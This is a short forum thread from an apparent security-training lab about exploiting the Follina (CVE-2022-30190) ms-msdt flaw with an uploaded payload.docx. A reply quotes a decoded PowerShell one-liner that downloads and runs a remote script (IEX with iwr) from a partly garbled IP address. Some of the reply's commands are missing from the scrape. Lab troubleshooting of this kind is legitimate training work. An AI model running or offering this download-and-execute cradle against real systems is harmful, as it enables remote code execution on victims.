Forum Discussion

kevinh's avatar
kevinh
Icon for Bronze II rankBronze II
24 days ago
Solved

CVE-2022-30190 (Follina) ms-msdt Scheme Abuse – Offensive Question 11

Hey guys, wondering if when trying to upload the payload for "Question 11: In a browser, visit http://<TARGET_IP>:8080, upload the payload.docx file, then press Submit and Execute...
  • steven's avatar
    21 days ago

    hmm...


    then execute:

    seems to be ok.

    and it works on my side:

    check if the encoding with base64 and copy/paste to the index.html worked.

    when I base64decode your string I get:
    IEX (iwr 'http://^W0.^W02.75.160/file.ps1')